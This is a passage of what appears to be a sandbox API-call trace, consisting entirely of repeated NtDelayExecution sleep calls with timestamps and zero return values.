(Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.813] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.815] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.816] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.818] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.819] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.821] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.822] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.824] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.825] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.827] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.828] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.830] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.831] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.833] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.834] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.836] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.838] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.839] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.843] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.845] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.847] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.848] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.850] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.851] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.853] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.854] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.856] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.857] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.859] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.860] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.862] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.863] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.865] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.866] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.868] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.869] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.871] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.872] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.874] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.880] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.881] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.883] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.884] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.886] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.887] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.889] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.890] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.892] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.893] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.895] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.896] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.898] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.899] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.901] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.902] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.904] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.905] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.907] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.909] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.911] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.914] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.915] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.917] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.918] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.920] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.921] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.925] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.927] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.928] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.930] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.931] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.933] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.934] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.936] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.938] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.939] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.941] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.942] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.944] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.949] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.951] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.952] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.954] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.955] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.957] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.958] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.960] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.962] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.963] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.965] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.966] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.968] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.969] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.971] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0145.006] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0145.041] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0145.075] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0145.108] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0145.143] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0145.177] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0145.208] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0145.209] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0145.214] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0145.217] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0145.218] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0145.236] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0145.240] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0145.570] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0145.691] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0145.698] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0145.701] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0145.702] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0145.704] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0145.705] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0145.707] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0145.708] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0145.710] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0145.711] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0145.714] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0145.715] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0145.717] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0145.718] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0145.720] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0145.721] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0145.723] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0145.724] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0145.726] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0145.729] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0145.730] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0145.732] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0145.733] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0145.735] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0145.736] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0145.738] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0145.740] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0145.741] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0145.743] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0145.746] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0145.747] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0145.749] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0145.750] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0145.752] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0145.753] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0145.755] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0145.756] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0145.758] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0145.759] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0145.762] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0145.763] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0145.765] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0145.766] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0145.774] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0145.776] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0145.781] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0145.783] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0145.785] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0145.787] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0145.788] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0145.789] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0145.792] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0145.930] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0145.949] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0145.953] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0145.992] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.032] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.069] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.105] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.146] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.229] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.266] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.299] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.333] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.371] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.379] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.380] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.382] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.383] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.385] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.386] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.388] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.394] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.395] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.396] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.398] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.399] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.401] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.403] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.404] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.406] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.407] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.409] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.410] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.412] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.413] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.415] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.416] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.418] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.419] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.421] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.423] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.425] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.427] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.428] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.432] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.434] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.435] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.442] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.444] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.445] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.447] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.452] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.454] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.455] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.457] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.462] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.464] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.465] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.467] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.476] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.477] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.479] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.480] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.486] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.488] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.489] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.491] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.497] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.498] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.500] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.507] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.508] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.510] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.511] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.522] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.524] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.525] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.527] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.535] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.536] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.538] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.539] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.545] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.546] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.548] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.549] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.555] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.561] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.562] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.564] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.565] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.568] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.569] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.571] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.587] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.589] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.590] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.592] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.593] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.595] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.597] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.598] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.600] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.601] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.604] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.605] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.607] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.609] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.610] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.612] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.614] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.616] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.618] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.619] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.621] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.623] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.624] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.626] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.647] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.648] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.650] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.651] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.654] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.655] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.656] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.658] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.659] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.661] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.662] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.666] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.709] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.716] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.718] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.719] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.728] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.729] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.731] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.732] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.739] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.742] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.743] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.745] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.751] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.753] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.755] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.763] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.768] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.769] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.771] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.780] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.782] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.783] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.790] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.792] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.793] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.795] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.801] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.802] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.804] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.805] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.811] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.813] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.814] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.819] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.826] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.827] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.829] NtDelayExecution 